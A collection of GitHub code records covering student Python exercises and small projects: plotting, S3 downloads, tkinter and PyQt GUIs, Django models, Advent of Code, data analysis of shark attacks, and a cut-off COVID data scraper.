z=\"z\",\n title=settings[\"title\"],\n color=settings[\"value\"],\n color_continuous_scale=\"edge\", # px.colors.sequential.ed\n # this does not work\n hover_data={\n settings[\"year\"]: True,\n settings[\"month\"]: True,\n settings[\"value\"]: \":.1f\",\n \"x\": False,\n \"y\": False,\n \"z\": False,\n },\n )\n fig.update_yaxes(visible=False, showticklabels=False)\n fig.update_xaxes(visible=False, showticklabels=False)\n fig.update_traces(mode=\"markers+lines\")\n\n fig.update_layout(\n width=800,\n height=700,\n autosize=False,\n # title=\"test\",\n scene=dict(\n camera=dict(\n up=dict(x=0, y=0, z=1),\n eye=dict(\n x=0,\n y=1.0707,\n z=1,\n ),\n ),\n aspectratio=dict(x=1, y=1, z=0.7),\n aspectmode=\"manual\",\n ),\n )\n\n st.plotly_chart(fig, width=1000, height=1000)\n","repo_name":"lcalmbach/climate-sci-graph","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":15988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30277021390","text":"#!/usr/bin/env python3\nimport boto3\nimport os\n\ns3 = boto3.client('s3')\n\ndef download_dir(prefix, local, bucket='tori-calculate-wind-power'):\n \"\"\"\n params:\n - prefix: pattern to match in s3\n - local: local path to folder in which to place files\n - bucket: s3 bucket with target contents\n \"\"\"\n keys = []\n dirs = []\n next_token = ''\n base_kwargs = {\n 'Bucket':bucket,\n 'Prefix':prefix,\n }\n while next_token is not None:\n kwargs = base_kwargs.copy()\n if next_token != '':\n kwargs.update({'ContinuationToken': next_token})\n results = s3.list_objects_v2(**kwargs)\n contents = results.get('Contents')\n for i in contents:\n k = i.get('Key')\n if k[-1] != '/':\n keys.append(k)\n else:\n dirs.append(k)\n next_token = results.get('NextContinuationToken')\n for d in dirs:\n dest_pathname = os.path.join(local, d)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n for k in keys:\n dest_pathname = os.path.join(local, k)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n s3.download_file(bucket, k, dest_pathname)\n\nif __name__ == '__main__':\n download_dir('output/', '/home/tori/wind/data')\n","repo_name":"jschmidtnj/tori-wind","sub_path":"analysis/download_output.py","file_name":"download_output.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2797210715","text":"import sys\n# from PyQt6.QtCore import QtCore\n# from PyQt6.QtGui import QtGui\nfrom PyQt6.QtWidgets import QLabel,QPushButton,QApplication,QMainWindow\n \n# vamos criar uma classe que herda de QMainWindow\nclass JanelaPrincipal(QMainWindow):\n # construtor da classe\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Sistema de LOG\")\n self.setGeometry(0,0,600,500)\n \n # vamos criar um botão QPushButton\n \n # definimos este botão como o controle central\n # da janela principal\n # self.setCentralWidget(botao)\n \nif __name__== \"__main__\":\n # cria a aplicação\n app = QApplication(sys.argv)\n \n # cria a janela principal e a coloca visível\n janela_principal = JanelaPrincipal()\n janela_principal.show()\n \n # executa a aplicação\n app.exec()","repo_name":"mateussiilva/gerenciador_de_log","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"28863125139","text":"#!/usr/bin/python3\n\n\"\"\"\nTakes in a letter\nSends a post request to http://0.0.0.0:5000/search_user\n\"\"\"\n\nif __name__ == \"__main__\":\n import requests\n import sys\n\n url = \"http://0.0.0.0:5000/search_user\"\n if len(sys.argv) == 2:\n q = {'q': sys.argv[1]}\n else:\n q = \"\"\n\n r = requests.post(url, data=q)\n try:\n obj = r.json()\n if not obj:\n print(\"No result\")\n exit(1)\n print(\"[{}] {}\".format(obj[\"id\"], obj[\"name\"]))\n except Exception:\n print(\"Not a valid JSON\")\n","repo_name":"rcezea/alx-higher_level_programming","sub_path":"0x11-python-network_1/8-json_api.py","file_name":"8-json_api.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7729215343","text":"def fun():\n print(\"hello\")\n print(\"funny\")\n print(\"man\")\nfun()\nprint(\"how are you\")\nfun()\nprint(\"how are you\")\n\n\ndef great(lang):\n if lang=='es':\n print(\"Hola\")\n elif lang=='fr':\n print(\"Bonjour\")\n else:\n print(\"Hello\")\ngreat('en')\ngreat('es')\ngreat('fr')\n\n\n# RETURN VALUE\n# Often a function will take its arguments ,\n# do some computation, and return a value to be\n# used as the function call in the calling expression.\n# the return keyword is used for this.\n\ndef greatest(lang):\n if lang=='es':\n return \"Hola\"\n elif lang=='fr':\n return \"Bonjour\"\n else:\n return \"Hello\"\nprint(greatest('en'),'glenn')\nprint(greatest('es'),'hotel')\nprint(greatest('fr'), 'Michael')\n\n\n\n#MULTIPLE PARAMETERS\n#We can define more than one parameter in the function definition\n#we simply add more arguments when we callm the function\n#we match the number and order of arguments and parameters\n\ndef add(a,b):\n added =a+b\n return added\n\nx=add(3,6)\nprint(x)","repo_name":"Himangshu1086/TUTORIALS","sub_path":"python/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"38208951672","text":"import qrcode, tkinter as tk\r\nfrom tkinter import font\r\n\r\nroot = tk.Tk()\r\nroot.geometry(\"860x560\")\r\nroot.configure(background=\"#00284d\")\r\nroot.resizable(False,False)\r\ntk.Wm.wm_title(root, \"QR Converter\")\r\ntext = tk.StringVar(root)\r\nname = tk.StringVar(root)\r\n\r\ndef convert():\r\n img = qrcode.make(text.get())\r\n img.save(name.get()+\".png\")\r\n\r\ndef clean():\r\n text.set(\"\")\r\n name.set(\"\")\r\n\r\ntk.Label(\r\n text=\"Type the text you want to convert to \\nQR Code.You can write anything, \\nincluding URL links.\",\r\n bg=\"#005cb3\",\r\n fg=\"White\",\r\n font=(\"Courier\", 25, \"bold\"),\r\n border=3,\r\n relief=\"solid\"\r\n\r\n ).pack(fill=tk.BOTH)\r\n\r\ntk.Label(\r\n text=\"TEXT:\",\r\n bg=\"#005cb3\",\r\n fg=\"White\",\r\n font=(\"Courier\", 30, \"bold\"),\r\n padx=10,\r\n pady=10,\r\n border=2,\r\n relief=\"solid\"\r\n\r\n ).place(x=20,y=190)\r\n\r\ntk.Label(\r\n text=\"FILE NAME:\",\r\n bg=\"#005cb3\",\r\n fg=\"White\",\r\n font=(\"Courier\", 30, \"bold\"),\r\n padx=10,\r\n pady=10,\r\n border=2,\r\n relief=\"solid\"\r\n\r\n ).place(x=20,y=300)\r\n\r\n\r\ntxt_enter = tk.Entry(\r\n bg=\"#005cb3\",\r\n fg=\"White\",\r\n textvariable=text,\r\n font=(\"Courier\", 15, \"bold\"),\r\n width=50,\r\n border=2,\r\n relief=\"solid\",\r\n justify=\"center\"\r\n\r\n).place(x=210,y=190, height=70)\r\n\r\nfilename = tk.Entry(\r\n bg=\"#005cb3\",\r\n fg=\"White\",\r\n textvariable=name,\r\n font=(\"Courier\", 15, \"bold\"),\r\n width=40,\r\n border=2,\r\n relief=\"solid\",\r\n justify=\"center\"\r\n\r\n).place(x=330,y=300, height=70)\r\n\r\ntk.Button(\r\n text=\"CONVERT\",\r\n bg=\"#005cb3\",\r\n fg=\"White\",\r\n font=(\"Courier\", 30, \"bold\"),\r\n border=5,\r\n relief=\"raised\",\r\n justify=\"center\",\r\n command=convert\r\n\r\n).place(x=590,y=410)\r\n\r\ntk.Button(\r\n text=\"CLEAN\",\r\n bg=\"#005cb3\",\r\n fg=\"White\",\r\n font=(\"Courier\", 30, \"bold\"),\r\n border=5,\r\n relief=\"raised\",\r\n justify=\"center\",\r\n command=clean\r\n\r\n).place(x=360,y=410)\r\n\r\ntk.mainloop()\r\n\r\n","repo_name":"Conper/QR-converter","sub_path":"QRCode-Converter-TKINTER.py","file_name":"QRCode-Converter-TKINTER.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27450043896","text":"import json\r\nimport math\r\nimport sys\r\nfrom functools import partial\r\n\r\n# funkcija koja proverava da li tacka pripada kvadrantu\r\ndef pripada(kvadrant, tacka): # 1, {'teme': 'A', 'koordinate': [10.0, 1.1]}\r\n koordinate = tacka[\"koordinate\"]\r\n if kvadrant == 1:\r\n return koordinate[0] >=0 and koordinate[1] >=0\r\n elif kvadrant == 2:\r\n return koordinate[0] <=0 and koordinate[1] >=0\r\n elif kvadrant == 3:\r\n return koordinate[0] <=0 and koordinate[1] <=0\r\n elif kvadrant == 4:\r\n return koordinate[0] >=0 and koordinate[1] <=0\r\n else:\r\n print(\"Error: Kvadrant nije ispravno unet\")\r\n exit()\r\n\r\nif len(sys.argv) != 2:\r\n print(\"Niste naveli dovoljno argumenta komandne linije: kvadrant\")\r\n exit(1)\r\n\t\r\ntry:\r\n\twith open(\"tacke.json\",\"r\") as f: # [{'teme': 'A', 'koordinate': [10.0, 1.1]}, ...]\r\n\t\ttacke = json.load(f)\r\nexcept IOError:\r\n\tprint('Error: open json file')\r\n\texit(1)\r\n\t\r\ntry:\r\n\tkvadrant = int(sys.argv[1])\r\nexcept ValueError:\r\n\tprint('Error: invalid cast')\r\n\texit(1)\r\n\t\r\n# sa partial fiksiramo jedan argument: kvadrant\r\n# partial vraca objekat koji se moze pozvati kao funkcija (u konkretnom slucaju jednog argumenta)\r\nuslov = partial(pripada, kvadrant)\r\nkvadrant_tacke = list(filter(uslov, tacke)) # listu dobijamo od filter objecta\r\n\r\n# Ispis\r\nif len(kvadrant_tacke) > 0:\r\n print(min(kvadrant_tacke, key = lambda x: x['koordinate'][0]**2 + x['koordinate'][1]**2))\r\nelse:\r\n print(\"Trazena tacka ne postoji\")\r\n\t\r\n# Eventualno resavanje zadatka sortiranjem: (nije efikasno)\r\n# sortirane_tacke = sorted(tacke, key = lambda x: x['koordinate'][0]**2 + x['koordinate'][1]**2)\r\n# print(sortirane_tacke)\r\n\r\n\r\n\r\n","repo_name":"matf-pp/PPI-materials","sub_path":"03_python_functional/3_08.py","file_name":"3_08.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"sh","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"5500612215","text":"# coding=utf-8\nimport io\nimport shutil\nimport os\n\n# 文件写入 with...as 类似于java7中 try...with resources\nwith io.open(\"./tmp.txt\", mode='x+') as f:\n f.writelines(\"hello world1\\n\")\n f.writelines(\"hello world2\\n\")\n f.writelines(\"hello world3\\n\")\n\n# 文件读取\nf = \"\"\ntry:\n f = io.open(\"./tmp.txt\", mode='r+')\n for line in f.readlines():\n print(line)\nfinally:\n f.close()\n\n# 文件copy\nshutil.copy('./tmp.txt', './tmp1.txt')\n\n# 获取文件属性\nprint(\"======获取文件属性======\")\nprint(os.stat(\"./tmp1.txt\"))\nprint(os.getcwd())\n\n# 删除文件\nos.remove(\"./tmp.txt\")\nos.remove(\"./tmp1.txt\")\n","repo_name":"penghuiping/python-learn","sub_path":"src/c6_file/FileTest.py","file_name":"FileTest.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34607423651","text":"from django.db import models\nfrom datetime import date\nfrom mancay.models import Book\nfrom django.contrib.auth.models import User\nfrom multiselectfield import MultiSelectField\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, null=True, on_delete=models.CASCADE)\n name = models.CharField(max_length=200, null=True)\n member_since = models.DateField(default=date.today())\n\n profile_pic = models.ImageField(null=True, blank=True)\n\n INTEREST_CHOICES = (\n ('Fiction', 'Fiction'),\n ('Non-Fiction', 'Non-Fiction'),\n ('Historical', 'Historical'),\n ('Biography', 'Biography'),\n ('Self-Development', 'Self-Development'),\n ('Business', 'Business')\n )\n\n interest = MultiSelectField(null=True, choices=INTEREST_CHOICES)\n\n\n def __str__(self):\n return self.name","repo_name":"finazaria/bookmeplease","sub_path":"fina/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27863260092","text":"grid = [line.strip() for line in open('d21.txt')]\nrocks = {(x, y) for y, line in enumerate(grid) for x, ch in enumerate(line.strip()) if ch == '#'}\nstart = next((x, y) for y, line in enumerate(grid) for x, ch in enumerate(line.strip()) if ch == 'S')\nheight, width = len(grid), len(grid[0])\nsize = height if height == width else None\n\n# Part 1 - BFS for creating distance map on original grid\nfront, steps, distmap = {start}, 0, {start: 0}\nwhile front:\n steps += 1\n new_front = set()\n for x, y in front:\n for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n nx, ny = x + dx, y + dy \n if nx < 0 or nx >= width or ny < 0 or ny >= height: continue\n if (nx, ny) in rocks or (nx, ny) in distmap: continue\n distmap[(nx, ny)] = steps\n new_front.add((nx, ny))\n front = new_front\nprint(len([pos for pos, step in distmap.items() if step <= 64 and step % 2 == 0]))\n\n# Part 2 - geometrical solution true after every 2nd step\nN = 26501365\nn = (N - (size - 1) // 2) // size\ntile_odd = len([pos for pos, step in distmap.items() if step % 2 == 1])\ntile_even = len([pos for pos, step in distmap.items() if step % 2 == 0])\ntriang_odd = len([pos for pos, step in distmap.items() if step > 65 and step % 2 == 1])\ntriang_even = len([pos for pos, step in distmap.items() if step > 65 and step % 2 == 0])\nprint((n + 1)**2 * tile_odd + n**2 * tile_even + n * triang_even - (n + 1) * triang_odd)","repo_name":"olamberti/advent-of-code","sub_path":"2023/d21.py","file_name":"d21.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23115676491","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport os\n\nos.getcwd()\nos.chdir(\"C:/Users/gdcma/Ironhack/Projects/data-cleaning-pandas/\")\n\n# Shark related attacks according to sex\ndef visualSex(path):\n df = pd.read_csv(path)\n # Total attacks in F and M\n sns.set(rc={\"figure.figsize\": (5, 4)}, font_scale=0.75)\n sns.set_style(\"white\")\n plt.figure()\n sex_gral = sns.countplot(x=df[\"Sex\"])\n sex_gral.set(title = \"Total attacks in men and women\")\n sex_gral.bar_label(sex_gral.containers[0])\n sex_gral.figure.savefig(\"images/sex_gral.jpg\", dpi=1000);\n # % attacks in F and M\n plt.figure()\n sex_percentage = df[\"Sex\"].value_counts().plot.pie(autopct=\"%.1f%%\")\n sex_percentage.set(title = \"Percentage of attacks in men and women\")\n sex_percentage.figure.savefig(\"images/sex_percentage.jpg\", dpi=1000);\n # Attacks from 1880 in M and F\n df_history = df[df[\"Year\"] > 1880]\n plt.figure()\n sex_history1880 = sns.histplot(data=df_history, x=\"Year\", hue=\"Sex\", multiple=\"stack\")\n sex_history1880.set(title = \"Attacks in men and women from 1880\")\n sex_history1880.figure.savefig(\"images/sex_history1880.jpg\", dpi=1000)\n # Open images:\n os.startfile(\"images/sex_percentage.jpg\")\n os.startfile(\"images/sex_gral.jpg\")\n os.startfile(\"images/sex_history1880.jpg\")\n\ndef visualHistory(path):\n df = pd.read_csv(path)\n sns.set(rc={\"figure.figsize\": (5, 4)}, font_scale=0.75)\n sns.set_style(\"white\")\n # Attacks throughout history\n plt.figure()\n history = sns.boxplot(x = \"Year\", data = df); # There is not much information about shark attacks previous to 1880\n history.set(title = \"Total attacks throughout time\")\n history.figure.savefig(\"images/history.jpg\", dpi=1000);\n # Attacks from 1880\n df_history = df[df[\"Year\"] > 1880]\n plt.figure()\n history1880 = sns.histplot(data=df_history, x=\"Year\")\n history1880.set(title = \"Total attacks throughout time from 1880\")\n history1880.figure.savefig(\"images/history1880.jpg\", dpi=1000);\n # Deaths from 1880\n plt.figure()\n fatal_history1880 = sns.histplot(data=df_history.loc[df_history[\"Fatal\"] == \"Y\"], x=\"Year\");\n fatal_history1880.figure.savefig(\"images/fatal_history1880.jpg\", dpi=1000)\n # Open images:\n os.startfile(\"images/history.jpg\")\n os.startfile(\"images/history1880.jpg\")\n os.startfile(\"images/fatal_history1880.jpg\")\n\n# Shark related deaths according to sex\ndef visualDeathSex(path):\n df = pd.read_csv(path)\n sns.set(rc={\"figure.figsize\": (5, 4)}, font_scale=0.75)\n sns.set_style(\"white\")\n # Percentage of attacks that are deadly\n plt.figure()\n deaths = df[\"Fatal\"].value_counts().plot.pie(autopct=\"%.1f%%\");\n deaths.set(title = \"Percentage of fatal events\")\n deaths.figure.savefig(\"images/deaths.jpg\", dpi=1000);\n # Percentage of attacks that are deadly depending on sex\n df_F = df[df[\"Sex\"] == \"F\"]\n df_M = df[df[\"Sex\"] == \"M\"]\n plt.figure()\n fatal_Fem = df_F[\"Fatal\"].value_counts().plot.pie(autopct=\"%.1f%%\");\n fatal_Fem.set(title = \"Percentage of deadly attacks in women\")\n fatal_Fem.figure.savefig(\"images/fatal_Fem.jpg\", dpi=1000)\n plt.figure()\n fatal_Men = df_M[\"Fatal\"].value_counts().plot.pie(autopct=\"%.1f%%\");\n fatal_Men.set(title = \"Percentage of deadly attacks in men\")\n fatal_Men.figure.savefig(\"images/fatal_Men.jpg\", dpi=1000)\n # Apparently, men die more from shark attacks than women after suffering an attack\n # Deaths from 1880 in M and F\n df_history = df[df[\"Year\"] > 1880]\n plt.figure()\n fatal_Sexhistory1880 = sns.histplot(data=df_history.loc[df_history[\"Fatal\"] == \"Y\"], x=\"Year\", hue=\"Sex\", multiple=\"stack\");\n fatal_Sexhistory1880.set(title = \"Deaths in men and women throughout time\")\n fatal_Sexhistory1880.figure.savefig(\"images/fatal_Sexhistory1880.jpg\", dpi=1000)\n # Open images:\n os.startfile(\"images/fatal_Fem.jpg\")\n os.startfile(\"images/fatal_Men.jpg\")\n os.startfile(\"images/fatal_Sexhistory1880.jpg\")\n\n# Shark related child deaths according to sex throughout history\ndef kids(path):\n df = pd.read_csv(path)\n sns.set(rc={\"figure.figsize\": (5, 4)}, font_scale=0.75)\n sns.set_style(\"white\")\n mask_kids = pd.DataFrame(df.loc[(df[\"Age\"] < 13)])\n mask_kidsfatal = pd.DataFrame(df.loc[(df[\"Age\"] < 13) & (df[\"Fatal\"] == \"Y\")])\n # Attacks to kids throughout history\n plt.figure()\n kid_attacks = sns.histplot(data=mask_kids, x=\"Year\");\n kid_attacks.set(title = \"Attacks suffered by children throughout time\")\n kid_attacks.figure.savefig(\"images/kid_attacks.jpg\", dpi=1000)\n # Attacks to kids throughout history according to sex\n plt.figure()\n sexkid_attacks = sns.histplot(data=mask_kids, x=\"Year\", hue=\"Sex\", multiple=\"stack\");\n sexkid_attacks.set(title = \"Attacks suffered by boys and girls throughout time\") \n sexkid_attacks.figure.savefig(\"images/sexkid_attacks.jpg\", dpi=1000)\n # Deaths of kids throughout history\n plt.figure()\n kid_deaths = sns.histplot(data=mask_kidsfatal, x=\"Year\");\n kid_deaths.set(title = \"Deaths of children throughout time\") \n kid_deaths.figure.savefig(\"images/kid_deaths.jpg\", dpi=1000)\n # Deaths of kids throughout history according to sex\n plt.figure()\n sexkid_deaths = sns.histplot(data=mask_kidsfatal, x=\"Year\", hue=\"Sex\", multiple=\"stack\");\n sexkid_deaths.set(title = \"Deaths of boys and girls throughout time\")\n sexkid_deaths.figure.savefig(\"images/sexkid_deaths.jpg\", dpi=1000)\n #Age of the deaths throughout history\n plt.figure()\n agekid_deaths = sns.lineplot(data=mask_kidsfatal, x=\"Year\", y=\"Age\");\n agekid_deaths.set(title = \"Age of deaths of children throughout time\")\n agekid_deaths.figure.savefig(\"images/agekid_deaths.jpg\", dpi=1000)\n plt.figure()\n scatteredagekid_deaths = sns.scatterplot(data=mask_kidsfatal, x=\"Year\", y =\"Age\"); #Not clear, recategorise the Age\n scatteredagekid_deaths.figure.savefig(\"images/scatteredagekid_deaths.jpg\", dpi=1000)\n # Recateg age of kids\n mask_toddler = (mask_kids[\"Age\"] < 3)\n mask_preschool = (mask_kids[\"Age\"] >= 3) & (mask_kids[\"Age\"] < 6)\n mask_school = (mask_kids[\"Age\"] >= 6) & (mask_kids[\"Age\"] < 12)\n mask_kids.loc[mask_toddler, \"Age_categ\"] = \"Toddler\"\n mask_kids.loc[mask_preschool, \"Age_categ\"] = \"Preschooler\"\n mask_kids.loc[mask_school, \"Age_categ\"] = \"School-aged\"\n mask_fataltoddler = (mask_kidsfatal[\"Age\"] < 3)\n mask_fatalpreschool = (mask_kidsfatal[\"Age\"] >= 3) & (mask_kidsfatal[\"Age\"] < 6)\n mask_fatalschool = (mask_kidsfatal[\"Age\"] >= 6) & (mask_kidsfatal[\"Age\"] < 12)\n mask_kidsfatal.loc[mask_fataltoddler, \"Age_categ\"] = \"Toddler\"\n mask_kidsfatal.loc[mask_fatalpreschool, \"Age_categ\"] = \"Preschooler\"\n mask_kidsfatal.loc[mask_fatalschool, \"Age_categ\"] = \"School-aged\"\n # Category of age of the attacks throughout history\n plt.figure()\n agekid_attacks = sns.histplot(data=mask_kids, x=\"Year\", hue = \"Age_categ\", multiple=\"stack\");\n agekid_attacks.set(title = \"Attacks by age category of children throughout time\")\n agekid_attacks.figure.savefig(\"images/agekid_attacks.jpg\", dpi=1000)\n # Category of age of the deaths throughout history\n plt.figure()\n agecategkid_deaths = sns.histplot(data=mask_kidsfatal, x=\"Year\", hue = \"Age_categ\", multiple=\"stack\");\n agecategkid_deaths.figure.savefig(\"images/agecategkid_deaths.jpg\", dpi=1000)\n # Open images:\n os.startfile(\"images/kid_attacks.jpg\")\n os.startfile(\"images/sexkid_attacks.jpg\")\n os.startfile(\"images/kid_deaths.jpg\")\n os.startfile(\"images/sexkid_deaths.jpg\")\n os.startfile(\"images/agekid_deaths.jpg\")\n os.startfile(\"images/scatteredagekid_deaths.jpg\")\n os.startfile(\"images/agekid_attacks.jpg\")\n os.startfile(\"images/agecategkid_deaths.jpg\")\n\n# Shark's favourite food\ndef lunch(path):\n df = pd.read_csv(path)\n sns.set(rc={\"figure.figsize\": (5, 4)}, font_scale=0.75)\n sns.set_style(\"white\")\n # Moment of day sharks attack the most\n plt.figure()\n lunch = df[\"Moment\"].value_counts().plot.pie(autopct=\"%.1f%%\"); # NaN: 1918; and not NaN: 2895\n lunch.set(title = \"Percentage of attacks by moment of day\");\n lunch.figure.savefig(\"images/lunch.jpg\", dpi=1000)\n # Moment of day sharks attack the most according to sex\n plt.figure()\n sex_lunch = sns.countplot(x=df[\"Moment\"], hue=df[\"Sex\"], palette=\"magma\");\n sex_lunch.set(title = \"Moment of day sharks attack the most according to sex\");\n sex_lunch.figure.savefig(\"images/sex_lunch.jpg\", dpi=1000)\n # Open images:\n os.startfile(\"images/lunch.jpg\")\n os.startfile(\"images/sex_lunch.jpg\")","repo_name":"MartaGDC/data-cleaning-pandas","sub_path":"src/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":8645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37688896783","text":"class InvalidDataError(Exception):\n ...\n\nclass ContentSerializer:\n required_keys = {\n \"title\": str, \n \"module\": str, \n \"description\": str, \n \"students\": int, \n \"is_active\": bool\n }\n\n\n def __init__(self, *args, **kwargs):\n self.data = kwargs\n self.errors = {}\n\n\n def data_validation(self):\n self.ignore_extra_keys()\n\n try:\n self.validate_required_keys()\n self.expected_types()\n return True\n except InvalidDataError:\n return False\n \n\n def ignore_extra_keys(self):\n data_keys = set(self.data.keys())\n\n for key in data_keys:\n if key not in self.required_keys.keys():\n self.data.pop(key)\n \n def validate_required_keys(self):\n for key in self.required_keys.keys():\n if key not in self.data.keys():\n self.errors[key] = \"missing key\"\n\n if self.errors:\n raise InvalidDataError\n\n def expected_types(self):\n for key, value_type in self.required_keys.items():\n if type(self.data[key]) is not value_type:\n self.errors[key] = f'must be a {value_type.__name__}'\n\n if self.errors:\n raise InvalidDataError\n","repo_name":"letlm/kontent-python","sub_path":"content/content_serializer.py","file_name":"content_serializer.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73447881700","text":"from csv import DictReader\nfrom typing import NamedTuple\nimport os\nimport os.path\n\ndef csvrows(path: str):\n with open(path, encoding='utf-8-sig') as csvreader:\n reader = DictReader(csvreader)\n for row in reader:\n yield row\n\n\nclass OccupationDescription(NamedTuple):\n code: int\n title: str\n description: str\n\nclass CoreCompetency(NamedTuple):\n name: str\n score: int\n\nOCCUPATION_DESCRIPTIONS: dict[int, OccupationDescription] = dict()\nOCCUPATION_CORE_COMPETENCIES: dict[int, list[CoreCompetency]] = dict()\nOCCUPATION_TECHNOLOGY_TOOLS: dict[int, list[str]] = dict()\nTITLE_TO_CODE: dict[str, int] = dict()\n\nSPECIALIST_TASKS: dict[int, dict[str, dict[str, list[str]]]] = dict()\n\nfor r in csvrows('data/occupation_descriptions.csv'):\n o = OccupationDescription(int(r['ANZSCO_Code']), r['ANZSCO_Title'], r['ANZSCO_Desc'])\n OCCUPATION_DESCRIPTIONS[o.code] = o\n TITLE_TO_CODE[o.title] = o.code\n\nfor r in csvrows('data/core_competencies.csv'):\n code = int(r['ANZSCO_Code'])\n\n if code not in OCCUPATION_CORE_COMPETENCIES:\n OCCUPATION_CORE_COMPETENCIES[code] = []\n\n OCCUPATION_CORE_COMPETENCIES[code].append(\n CoreCompetency(r['Core_Competencies'], int(r['Score'])))\n\nfor r in csvrows('data/technology_tools.csv'):\n code = int(r['ANZSCO_Code'])\n if code not in OCCUPATION_TECHNOLOGY_TOOLS:\n OCCUPATION_TECHNOLOGY_TOOLS[code] = []\n OCCUPATION_TECHNOLOGY_TOOLS[code].append(r['Technology_tool'])\n\nfor r in csvrows('data/specialist_tasks.csv'):\n code = int(r['ANZSCO_Code'])\n if code not in SPECIALIST_TASKS:\n SPECIALIST_TASKS[code] = dict()\n\n cluster_family = r['Cluster_Family']\n if cluster_family not in SPECIALIST_TASKS[code]:\n SPECIALIST_TASKS[code][cluster_family] = dict()\n\n specialist_cluster = r['Specialist_Cluster']\n if specialist_cluster not in SPECIALIST_TASKS[code][cluster_family]:\n SPECIALIST_TASKS[code][cluster_family][specialist_cluster] = []\n\n specialist_task = r['Specialist_Task']\n SPECIALIST_TASKS[code][cluster_family][specialist_cluster].append(specialist_task)\n","repo_name":"fryeb/jobs_data","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4851730499","text":"import aoc_utils\nlines = aoc_utils.readlines()\nfor x in lines:\n print(x)\naim = 'a'\nsoldict = {}\nfor x in lines:\n solution = ''\n i = 0\n while True:\n if x[i] == '-':\n break\n solution += x[i]\n i+=1\n soldict[x.split()[-1]] = solution\nsolution = soldict[aim]\nprint(solution)\nprint(soldict[\"lx\"])\nwhile any(substring in solution for substring in soldict):\n x = solution.split()\n for i in range(len(x)):\n if x[i] in soldict:\n x[i] = \"(\"+soldict[x[i]]+\")\"\n solution = \"\"\n for word in x:\n solution += \" \"\n solution += word\n print(solution)\n input()\n","repo_name":"sapieninja/AdventOfCode","sub_path":"Python/Python15/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8091394340","text":"from bottle import ServerAdapter\n\n\nclass SipperCherootServer(ServerAdapter):\n \"\"\" Custom WSGIRefServer implementation to accommodate shutdown, ssl etc. \"\"\"\n server = None\n\n def __init__(self, host='127.0.0.1', port=8080,\n ssl_enabled=False,\n ssl_cert=None,\n ssl_key=None,\n silent=False):\n super().__init__(host, port)\n self.ssl_enabled = ssl_enabled\n self.ssl_cert = ssl_cert\n self.ssl_key = ssl_key\n self.silent = silent\n\n def run(self, handler):\n from cheroot import wsgi\n from cheroot.ssl import builtin\n\n self.options['bind_addr'] = (self.host, self.port)\n self.options['wsgi_app'] = handler\n\n self.server = wsgi.Server(**self.options)\n\n if self.ssl_enabled:\n # Configure SSL context with certificates\n self.server.ssl_adapter = builtin.BuiltinSSLAdapter(\n self.ssl_cert, self.ssl_key)\n try:\n self.server.start()\n finally:\n self.server.stop()\n\n def shutdown(self):\n self.server.stop()\n self.server = None\n","repo_name":"leogps/bottle-sipper","sub_path":"sipper_core/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"73408097699","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n# 질본 > 시별 발생 현황 url\r\nurl = \"http://ncov.mohw.go.kr/bdBoardList_Real.do?brdId=1&brdGubun=13&ncvContSeq=&contSeq=&board_id=&gubun=\"\r\n\r\nresponse = requests.get(url)\r\nhtml = BeautifulSoup(response.content, 'lxml')\r\n\r\n\r\n# 수집 시점 정보\r\ntimehtml = html.select(\"div.timetable\")\r\ntimeinfo = timehtml[0].select_one('p').text\r\n\r\n\r\n# 시도별 상세 확진자 현황 table 부분 (data_table)\r\nmgt24 = html.select(\"div.data_table\")\r\n\r\n# 테이블의 thead 태그 범위 (column)\r\ntable_head = mgt24[0].select_one(\"thead\")\r\n\r\n# 테이블의 tbody 태그 범위 (row)\r\ntable_body = mgt24[0].select_one(\"tbody\")\r\n\r\n\r\n\r\n# 테이블 컬럼 이름 